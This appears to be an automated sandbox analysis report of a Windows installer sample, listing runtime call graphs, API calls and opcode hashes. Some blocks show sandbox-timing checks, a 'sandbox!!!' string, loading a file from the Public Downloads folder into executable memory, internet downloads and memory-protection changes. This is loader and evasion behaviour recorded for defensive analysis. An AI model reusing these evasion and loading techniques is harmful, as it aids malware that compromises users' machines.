66 API calls __getptd_noexit 25993->26171 25995 26b0f4 26172 26a90d 11 API calls ___strgtold12_l 25995->26172 25997 26b0ff 25997->25901 25998->25903 25999->25892 26001 26bef3 __ftelli64 26000->26001 26002 26bf16 26001->26002 26003 26befb 26001->26003 26005 26bf22 26002->26005 26008 26bf5c 26002->26008 26101 26a972 66 API calls __getptd_noexit 26003->26101 26103 26a972 66 API calls __getptd_noexit 26005->26103 26006 26bf00 26102 26a95f 66 API calls __getptd_noexit 26006->26102 26025 273e85 26008->26025 26010 26bf27 26104 26a95f 66 API calls __getptd_noexit 26010->26104 26013 26bf62 26015 26bf84 26013->26015 26016 26bf70 26013->26016 26014 26bf2f 26105 26a90d 11 API calls ___strgtold12_l 26014->26105 26106 26a95f 66 API calls __getptd_noexit 26015->26106 26035 26b7ea 26016->26035 26020 26bf08 __ftelli64 26020->25987 26021 26bf7c 26108 26bfb3 LeaveCriticalSection __unlock_fhandle 26021->26108 26022 26bf89 26107 26a972 66 API calls __getptd_noexit 26022->26107 26026 273e91 __ftelli64 26025->26026 26027 273eeb 26026->26027 26030 26b7b7 __lock 66 API calls 26026->26030 26028 273ef0 EnterCriticalSection 26027->26028 26029 273f0d __ftelli64 26027->26029 26028->26029 26029->26013 26031 273ebd 26030->26031 26032 273ec6 InitializeCriticalSectionAndSpinCount 26031->26032 26033 273ed9 26031->26033 26032->26033 26109 273f1b LeaveCriticalSection _doexit 26033->26109 26036 26b7f9 __write_nolock 26035->26036 26037 26b84e 26036->26037 26038 26b82f 26036->26038 26070 26b824 26036->26070 26042 26b8aa 26037->26042 26043 26b88d 26037->26043 26119 26a972 66 API calls __getptd_noexit 26038->26119 26041 26bee5 26041->26021 26046 26b8c0 26042->26046 26047 26b8b1 26042->26047 26122 26a972 66 API calls __getptd_noexit 26043->26122 26044 26b834 26120 26a95f 66 API calls __getptd_noexit 26044->26120 26110 2723d6 26046->26110 26125 26c47c 68 API calls 2 library calls 26047->26125 26049 26b892 26123 26a95f 66 API calls __getptd_noexit 26049->26123 26051 26b83b 26121 26a90d 11 API calls ___strgtold12_l 26051->26121 26053 26b8c6 26057 26bb68 26053->26057 26126 26979c 26053->26126 26055 26b8bd 26055->26046 26060 26bb77 26057->26060 26061 26be18 WriteFile 26057->26061 26058 26b89a 26124 26a90d 11 API calls ___strgtold12_l 26058->26124 26063 26bc32 26060->26063 26072 26bb8a 26060->26072 26065 26bb4a 26061->26065 26066 26be4b GetLastError 26061->26066 26076 26bc3f 26063->26076 26079 26bd0c 26063->26079 26067 26be96 26065->26067 26065->26070 26074 26be69 26065->26074 26066->26065 26067->26070 26135 26a95f 66 API calls __getptd_noexit 26067->26135 26068 26b90a 26068->26057 26069 26b91a GetConsoleCP 26068->26069 26069->26065 26098 26b93d 26069->26098 26137 2665d1 26070->26137 26071 26bbd4 WriteFile 26071->26066 26078 26bc08 26071->26078 26072->26067 26072->26071 26081 26be74 26074->26081 26082 26be88 26074->26082 26075 26bcae WriteFile 26075->26066 26084 26bce2 26075->26084 26076->26067 26076->26075 26077 26beb9 26136 26a972 66 API calls __getptd_noexit 26077->26136 26078->26065 26078->26072 26088 26bc2d 26078->26088 26079->26067 26080 26bd7d WideCharToMultiByte 26079->26080 26080->26066 26087 26bdb4 WriteFile 26080->26087 26132 26a95f 66 API calls __getptd_noexit 26081->26132 26134 26a985 66 API calls 2 library calls 26082->26134 26084->26065 26084->26076 26084->26088 26090 26bdeb GetLastError 26087->26090 26094 26bddf 26087->26094 26088->26065 26089 26be79 26133 26a972 66 API calls __getptd_noexit 26089->26133 26090->26094 26093 26ba41 26093->26065 26093->26066 26093->26098 26099 273ba3 WriteConsoleW CreateFileW __write_nolock 26093->26099 26100 26ba6e WriteFile 26093->26100 26094->26065 26094->26079 26094->26087 26094->26088 26095 26b9e9 WideCharToMultiByte 26095->26065 26097 26ba1a WriteFile 26095->26097 26096 273cfb 78 API calls __fassign 26096->26098 26097->26066 26097->26093 26098->26065 26098->26093 26098->26095 26098->26096 26131 2725d6 76 API calls __isleadbyte_l 26098->26131 26099->26093 26100->26066 26100->26093 26101->26006 26102->26020 26103->26010 26104->26014 26105->26020 26106->26022 26107->26021 26108->26020 26109->26027 26111 2723e3 26110->26111 26112 2723f2 26110->26112 26145 26a95f 66 API calls __getptd_noexit 26111->26145 26114 272410 26112->26114 26146 26a95f 66 API calls __getptd_noexit 26112->26146 26114->26053 26116 2723e8 26116->26053 26117 272403 26147 26a90d 11 API calls ___strgtold12_l 26117->26147 26119->26044 26120->26051 26121->26070 26122->26049 26123->26058 26124->26070 26125->26055 26148 269723 GetLastError 26126->26148 26128 2697a4 26129 2697b1 GetConsoleMode 26128->26129 26163 26b61f 66 API calls 3 library calls 26128->26163 26129->26057 26129->26068 26131->26098 26132->26089 26133->26070 26134->26070 26135->26077 26136->26070 26138 2665db IsDebuggerPresent 26137->26138 26139 2665d9 26137->26139 26170 272685 26138->26170 26139->26041 26142 26e015 SetUnhandledExceptionFilter UnhandledExceptionFilter 26143 26e032 __call_reportfault 26142->26143 26144 26e03a GetCurrentProcess TerminateProcess 26142->26144 26143->26144 26144->26041 26145->26116 26146->26117 26147->26116 26164 2695fe TlsGetValue 26148->26164 26151 269742 26167 2663fd 66 API calls __calloc_crt 26151->26167 26152 269790 SetLastError 26152->26128 26154 26974e 26154->26152 26155 269756 DecodePointer 26154->26155 26156 26976b 26155->26156 26157 269787 26156->26157 26158 26976f 26156->26158 26169 264452 66 API calls 2 library calls 26157->26169 26168 26966f 66 API calls 4 library calls 26158->26168 26161 269777 GetCurrentThreadId 26161->26152 26162 26978d 26162->26152 26165 269613 DecodePointer TlsSetValue 26164->26165 26166 26962e 26164->26166 26165->26166 26166->26151 26166->26152 26167->26154 26168->26161 26169->26162 26170->26142 26171->25995 26172->25997 26173 263aa9 26174 263ac8 26173->26174 26175 263af4 26174->26175 26176 263b0e 26174->26176 26179 263a8a std::_Xfsopen 142 API calls 26174->26179 26182 263b15 26176->26182 26183 263a8a 26176->26183 26179->26176 26181 265902 _Xfiopen 102 API calls 26181->26175 26182->26175 26182->26181 26187 26747d 26183->26187 26185 263aa4 26185->26175 26186 2675c3 101 API calls 6 library calls 26185->26186 26186->26182 26190 267489 __ftelli64 26187->26190 26188 26749c 26245 26a95f 66 API calls __getptd_noexit 26188->26245 26190->26188 26192 2674c9 26190->26192 26191 2674a1 26246 26a90d 11 API calls ___strgtold12_l 26191->26246 26206 2714e3 26192->26206 26195 2674ce 26196 2674d5 26195->26196 26197 2674e2 26195->26197 26247 26a95f 66 API calls __getptd_noexit 26196->26247 26198 267509 26197->26198 26199 2674e9 26197->26199 26223 27124c 26198->26223 26248 26a95f 66 API calls __getptd_noexit 26199->26248 26203 2674ac __ftelli64 @_EH4_CallFilterFunc@8 26203->26185 26207 2714ef __ftelli64 26206->26207 26208 26b7b7 __lock 66 API calls 26207->26208 26220 2714fd 26208->26220 26209 271572 26250 27160d 26209->26250 26210 271579 26212 2663b8 __malloc_crt 66 API calls 26210->26212 26214 271580 26212->26214 26213 271602 __ftelli64 26213->26195 26214->26209 26215 27158e InitializeCriticalSectionAndSpinCount 26214->26215 26217 2715c1 EnterCriticalSection 26215->26217 26218 2715ae 26215->26218 26217->26209 26255 264452 66 API calls 2 library calls 26218->26255 26219 26b6f5 __mtinitlocknum 66 API calls 26219->26220 26220->26209 26220->26210 26220->26219 26253 265125 67 API calls __lock 26220->26253 26254 265193 LeaveCriticalSection LeaveCriticalSection _doexit 26220->26254 26224 27126e 26223->26224 26225 271282 26224->26225 26237 271299 26224->26237 26260 26a95f 66 API calls __getptd_noexit 26225->26260 26226 271436 26229 27149c 26226->26229 26230 27148a 26226->26230 26228 271287 26261 26a90d 11 API calls ___strgtold12_l 26228->26261 26257 275135 26229->26257 26266 26a95f 66 API calls __getptd_noexit 26230->26266 26234 27148f 26267 26a90d 11 API calls ___strgtold12_l 26234->26267 26235 267514 26249 26752f LeaveCriticalSection LeaveCriticalSection _fputc 26235->26249 26237->26226 26237->26230 26262 2754bf 76 API calls __fassign 26237->26262 26239 271405 26239->26230 26263 275359 85 API calls __mbsnbicmp_l 26239->26263 26241 27142f 26241->26226 26264 275359 85 API calls __mbsnbicmp_l 26241->26264 26243 27144e 26243->26226 26265 275359 85 API calls __mbsnbicmp_l 26243->26265 26245->26191 26246->26203 26247->26203 26248->26203 26249->26203 26256 26b6de LeaveCriticalSection 26250->26256 26252 271614 26252->26213 26253->26220 26254->26220 26255->26209 26256->26252 26268 275071 26257->26268 26259 275150 26259->26235 26260->26228 26261->26235 26262->26239 26263->26241 26264->26243 26265->26226 26266->26234 26267->26235 26271 27507d __ftelli64 26268->26271 26269 275090 26388 26a95f 66 API calls __getptd_noexit 26269->26388 26271->26269 26273 2750c6 26271->26273 26272 275095 26389 26a90d 11 API calls ___strgtold12_l 26272->26389 26279 27493d 26273->26279 26276 2750e0 26390 275107 LeaveCriticalSection __unlock_fhandle 26276->26390 26278 27509f __ftelli64 26278->26259 26280 274964 26279->26280 26391 277f22 26280->26391 26282 274bef 26417 26a8bb 26282->26417 26284 2749bf 26420 26a972 66 API calls __getptd_noexit 26284->26420 26285 274980 26285->26282 26285->26284 26295 274a1a 26285->26295 26287 275070 __ftelli64 26288 275090 26287->26288 26294 2750c6 26287->26294 26451 26a95f 66 API calls __getptd_noexit 26288->26451 26289 2749c4 26421 26a95f 66 API calls __getptd_noexit 26289->26421 26292 275095 26452 26a90d 11 API calls ___strgtold12_l 26292->26452 26293 2749ce 26422 26a90d 11 API calls ___strgtold12_l 26293->26422 26299 27493d __tsopen_nolock 120 API calls 26294->26299 26297 274aa1 26295->26297 26302 274a74 26295->26302 26423 26a972 66 API calls __getptd_noexit 26297->26423 26301 2750e0 26299->26301 26453 275107 LeaveCriticalSection __unlock_fhandle 26301->26453 26398 273f4b 26302->26398 26303 274aa6 26424 26a95f 66 API calls __getptd_noexit 26303->26424 26306 27509f __ftelli64 26306->26276 26307 274ab0 26425 26a90d 11 API calls ___strgtold12_l 26307->26425 26310 2749d8 26310->26276 26311 274b32 26312 274b5c CreateFileA 26311->26312 26313 274b3b 26311->26313 26314 274bf9 GetFileType 26312->26314 26315 274b89 26312->26315 26426 26a972 66 API calls __getptd_noexit 26313->26426 26318 274c06 GetLastError 26314->26318 26319 274c4a 26314->26319 26317 274bc2 GetLastError 26315->26317 26321 274b9d CreateFileA 26315->26321 26429 26a985 66 API calls 2 library calls 26317->26429 26431 26a985 66 API calls 2 library calls 26318->26431 26433 273d15 67 API calls __chsize_nolock 26319->26433 26320 274b40 26427 26a95f 66 API calls __getptd_noexit 26320->26427 26321->26314 26321->26317 26325 274c2f CloseHandle 26327 274be9 26325->26327 26328 274c3d 26325->26328 26326 274b4a 26428 26a95f 66 API calls __getptd_noexit 26326->26428 26430 26a95f 66 API calls __getptd_noexit 26327->26430 26432 26a95f 66 API calls __getptd_noexit 26328->26432 26332 274c68 26335 274cbe 26332->26335 26336 274f5c 26332->26336 26338 274d2d 26332->26338 26334 274c42 26334->26327 26434 271772 68 API calls 2 library calls 26335->26434 26336->26282 26339 274fe6 CloseHandle 26336->26339 26338->26336 26351 274dd7 26338->26351 26353 274e87 26338->26353 26343 27500f 26339->26343 26340 274cc8 26341 274cd1 26340->26341 26342 274cea 26340->26342 26435 26a972 66 API calls __getptd_noexit 26341->26435 26437 2734e7 76 API calls 6 library calls 26342->26437 26346 275013 GetLastError 26343->26346 26387 274ef2 26343->26387 26449 26a985 66 API calls 2 library calls 26346->26449 26348 27501f 26450 273d96 67 API calls __chsize_nolock 26348->26450 26351->26336 26361 274dfb 26351->26361 26362 274e26 26351->26362 26385 274e42 26351->26385 26352 274cfb 26359 274d14 26352->26359 26438 277cb1 100 API calls 4 library calls 26352->26438 26353->26336 26357 274ea4 26353->26357 26353->26361 26443 26c47c 68 API calls 2 library calls 26357->26443 26358 274cd6 26358->26338 26386 274cde 26358->26386 26359->26386 26439 271772 68 API calls 2 library calls 26359->26439 26361->26336 26364 26bee7 __write 97 API calls 26361->26364 26361->26386 26440 26c47c 68 API calls 2 library calls 26362->26440 26363 274eaf 26363->26361 26370 274eba 26363->26370 26364->26361 26365 274ee5 26445 26c5eb 69 API calls 3 library calls 26365->26445 26366 274eff 26368 274f21 26366->26368 26375 274f06 26366->26375 26367 274e5c 26367->26365 26367->26366 26367->26368 26374 274e7e 26367->26374 26367->26386 26448 271772 68 API calls 2 library calls 26368->26448 26444 26c47c 68 API calls 2 library calls 26370->26444 26374->26336 26447 271772 68 API calls 2 library calls 26375->26447 26376 274e31 26376->26361 26380 274e38 26376->26380 26377 274ec4 26377->26336 26377->26386 26378 274eec 26446 26a95f 66 API calls __getptd_noexit 26378->26446 26441 26c47c 68 API calls 2 library calls 26380->26441 26384 274f10 26384->26374 26384->26386 26385->26386 26442 2734e7 76 API calls 6 library calls 26385->26442 26436 26c5eb 69 API calls 3 library calls 26386->26436 26387->26282 26388->26272 26389->26278 26390->26278 26392 277f43 26391->26392 26393 277f2e 26391->26393 26392->26285 26454 26a95f 66 API calls __getptd_noexit 26393->26454 26395 277f33 26455 26a90d 11 API calls ___strgtold12_l 26395->26455 26397 277f3e 26397->26285 26399 273f57 __ftelli64 26398->26399 26400 26b6f5 __mtinitlocknum 66 API calls 26399->26400 26401 273f67 26400->26401 26402 26b7b7 __lock 66 API calls 26401->26402 26403 273f6c __ftelli64 26401->26403 26413 273f7b 26402->26413 26403->26311 26404 2740c6 26458 2740db LeaveCriticalSection _doexit 26404->26458 26406 274053 26457 2663fd 66 API calls __calloc_crt 26406->26457 26408 273ffb EnterCriticalSection 26411 27400b LeaveCriticalSection 26408->26411 26408->26413 26409 26b7b7 __lock 66 API calls 26409->26413 26410 27405c 26410->26404 26414 273e85 ___lock_fhandle 68 API calls 26410->26414 26411->26413 26412 273fd1 InitializeCriticalSectionAndSpinCount 26412->26413 26413->26404 26413->26406 26413->26408 26413->26409 26413->26412 26456 27401d LeaveCriticalSection _doexit 26413->26456 26416 2740bd 26414->26416 26416->26404 26459 26a792 26417->26459 26420->26289 26421->26293 26422->26310 26423->26303 26424->26307 26425->26310 26426->26320 26427->26326 26428->26310 26429->26327 26430->26282 26431->26325 26432->26334 26433->26332 26434->26340 26435->26358 26436->26334 26437->26352 26438->26359 26439->26358 26440->26376 26441->26385 26442->26367 26443->26363 26444->26377 26445->26378 26446->26387 26447->26384 26448->26377 26449->26348 26450->26387 26451->26292 26452->26306 26453->26306 26454->26395 26455->26397 26456->26413 26457->26410 26458->26403 26460 26a7b1 _memset __call_reportfault 26459->26460 26461 26a7cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 26460->26461 26462 26a89d __call_reportfault 26461->26462 26463 2665d1 ___getlocaleinfo 5 API calls 26462->26463 26464 26a8b9 GetCurrentProcess TerminateProcess 26463->26464 26464->26287

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 339 2625c8-2625ef call 264948 call 26221d 344 2625f1-2625f8 339->344 345 2625fa-262612 call 26184b 339->345 346 26265e-26268a call 261c08 call 2624f0 344->346 348 262615-262618 345->348 350 26261f 348->350 351 26261a-26261d 348->351 352 262626-262629 350->352 351->350 351->352 352->346
                APIs
                • __EH_prolog.LIBCMT ref: 002625C8
                  • Part of subcall function 0026221D: __EH_prolog.LIBCMT ref: 00262222
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction ID: 2c7e9c03fcb804da62e4d9e21cd0b56edb5e7c04ef737ffb3d301e471390b461
                • Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction Fuzzy Hash: 7911BC75910259EFCF10DF98CA809AEBBB4FF08314F10804EE60267251C7719A64DFA1
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 562c828927ec00fde05e1f0ad2f0c72adeeff74f940cdeafabe3d3a222a328ab
                • Instruction ID: a589e8dcf8172a42924b70a922242e57389e4cb0577e2e3a057488ba7e5fa2c6
                • Opcode Fuzzy Hash: 562c828927ec00fde05e1f0ad2f0c72adeeff74f940cdeafabe3d3a222a328ab
                • Instruction Fuzzy Hash: 37725D70A002199FDB14DFA9C895AAEBBF7FF88340F148569E446EB2A1DB74DC41CB50
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4781f5addb6cc3c9bc6736de0aa289fd53490dd2b3680e55a9018c5c1877a756
                • Instruction ID: 1cc636ed6c4c81150130e1c9ba3ce508f8fd10e29bbb0e5e4ce35024fae4963b
                • Opcode Fuzzy Hash: 4781f5addb6cc3c9bc6736de0aa289fd53490dd2b3680e55a9018c5c1877a756
                • Instruction Fuzzy Hash: 73529E34B402058FDB18EB75D46AB6E7BE7FF88301F108569E9069B391DF799D818B80
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0bed1678d3db59913e512e1e547f66047c1aa7f9b1f1f63126963dc1804ccbc
                • Instruction ID: c9e26acf7c2ee5625e0eab234b2d98e2fefbe5383b3ffa37341cec43c52532a2
                • Opcode Fuzzy Hash: e0bed1678d3db59913e512e1e547f66047c1aa7f9b1f1f63126963dc1804ccbc
                • Instruction Fuzzy Hash: ABC18274A04209DBDF184F65C8552AEFEBBFFC8751F18485DE443A6288CF388885CB65
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4727dc38e4552ae5d80f67e388d1ccf448d65f49309a2d9e6f565ef7125f3194
                • Instruction ID: 4ca6451a46af6ab19c695cbf9aa3339eb79d226f25d3c60470c6e34f681e9172
                • Opcode Fuzzy Hash: 4727dc38e4552ae5d80f67e388d1ccf448d65f49309a2d9e6f565ef7125f3194
                • Instruction Fuzzy Hash: 47B16D71E002499FDF10CFA9C886BEEBBF2BF88714F148129D815A7254EB759845CF91
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80f603c622bc8a5b52dd42ebe52d7d575f4968ad03c47b6e306ca5eb427fe3cc
                • Instruction ID: 55bf6945940dfda2e9fe2e69acae9fffd90bec5b5a5de56ddab991c922e76d69
                • Opcode Fuzzy Hash: 80f603c622bc8a5b52dd42ebe52d7d575f4968ad03c47b6e306ca5eb427fe3cc
                • Instruction Fuzzy Hash: 28B16C71E00209CFDB14CFA9D9867EEBBF2BF88714F148529D815EB294EB749845CB81

                Control-flow Graph

                APIs
                • GetTickCount64.KERNEL32 ref: 002611EF
                • Sleep.KERNEL32(0000012C), ref: 002611F9
                • GetTickCount64.KERNEL32 ref: 002611FF
                  • Part of subcall function 00264424: __vwprintf_l.LIBCMT ref: 00264432
                • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00261244
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0026124E
                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 0026125F
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00261270
                • CloseHandle.KERNEL32(00000000), ref: 00261277
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
                • String ID: C:\Users\Public\Downloads\ind.cod$`3#v01#v$sandbox!!!$v4:%d
                • API String ID: 1694741105-649293508
                • Opcode ID: 8e6e975e325b1f2ea6d59b2ba1624a6668fdc605a331f2150d69c5ef31f9f246
                • Instruction ID: 6c99efdb40445b0018693d4cdf595e5a2a79667a8c27062a4fcc0e206651883a
                • Opcode Fuzzy Hash: 8e6e975e325b1f2ea6d59b2ba1624a6668fdc605a331f2150d69c5ef31f9f246
                • Instruction Fuzzy Hash: 1911B1736503147FE720A7F9AC4EFAB7AACEF46770F200525FA09D2190E9A05C8086B1

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 00262E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
                • InternetCloseHandle.WININET(?), ref: 00262F2A
                  • Part of subcall function 00262D2E: __EH_prolog.LIBCMT ref: 00262D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
                • InternetCloseHandle.WININET(?), ref: 00262F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: ed0ec0436332dea7b094b59ae0f2b25c145ef28fd8231cbfc512236654bd34c4
                • Instruction ID: f1078095950a8647e8b04f179ae9d74261c2a3784c5e8810ef5d16ac3d43473e
                • Opcode Fuzzy Hash: ed0ec0436332dea7b094b59ae0f2b25c145ef28fd8231cbfc512236654bd34c4
                • Instruction Fuzzy Hash: BA211D7591161AEFDF119F90DC89FEEB778FB04354F500169B505B2190D6705EE4CE60

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 00262E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
                • InternetCloseHandle.WININET(?), ref: 00262F2A
                  • Part of subcall function 00262D2E: __EH_prolog.LIBCMT ref: 00262D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
                • InternetCloseHandle.WININET(?), ref: 00262F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: f4ec57822d720943671525f8b2add85e86816b901a13266037f8145254d0a3aa
                • Instruction ID: 8cda7fd1d29f37ae29ef3eb4701505f56be3ad137e0f2b5771b80def5fa0b60b
                • Opcode Fuzzy Hash: f4ec57822d720943671525f8b2add85e86816b901a13266037f8145254d0a3aa
                • Instruction Fuzzy Hash: E2115E7592121AEFEF109F94DC89FEEBB78EB05354F100179B50AB61A0C6705EE8CE60

                Control-flow Graph

                APIs
                • LoadLibraryA.KERNEL32(?,00000000,00000002,?,02E6FCB5,00000000), ref: 02E6FFF5
                • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02E6FCB5,00000000), ref: 02E70035
                • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02E70068
                • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02E70093
                • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02E700BD
                Memory Dump Source
                • Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction ID: 1093f04a73dac9305dbc2158974e9eccb2378d15fba036a640f4592c2c54aaf4
                • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction Fuzzy Hash: 4821C2B224130A6FD3609A64CC48EBB77ECEB84315B045C3EBE46D2550EB74E5088B60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 75 26297f-262991 call 264948 78 262997-2629a1 75->78 79 262993-262995 75->79 81 2629a3-2629ac 78->81 82 2629cf-2629d2 78->82 80 2629bf-2629cc 79->80 81->82 85 2629ae-2629ba 81->85 83 2629d4-2629de call 2619a1 82->83 84 2629ef-2629f2 82->84 90 2629f4-262a10 call 26252d 83->90 91 2629e0-2629e4 call 261fe5 83->91 87 2629be 84->87 88 2629bc 85->88 87->80 88->87 96 262a13-262a1a 90->96 94 2629e9-2629ed 91->94 94->84 94->88 97 262aa7-262aaa 96->97 98 262a20-262a23 96->98 99 262a25-262a48 97->99 98->99 101 262ac5 99->101 102 262a4a-262a4d 99->102 105 262ac8-262ad6 call 261c2d 101->105 103 262aaf-262ab2 102->103 104 262a4f-262a56 102->104 103->101 106 262ab4-262ac3 call 261fe5 103->106 107 262a5b-262a60 104->107 108 262a58 104->108 105->87 106->101 118 262adb-262ade 106->118 111 262a62-262a69 107->111 112 262a81-262a8b 107->112 108->107 115 262a6e-262a7f call 26566a 111->115 116 262a6b 111->116 117 262a8d-262a8f 112->117 112->118 115->101 115->112 116->115 117->96 120 262a91-262a95 117->120 118->105 120->101 122 262a97-262aa2 call 262423 120->122 122->96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Fputc$H_prolog
                • String ID:
                • API String ID: 1896196775-3916222277
                • Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
                • Instruction ID: 82e19215fa0f5cfe72516bff9f773a2622e3bedea6e30f37a4188476cc66a5db
                • Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
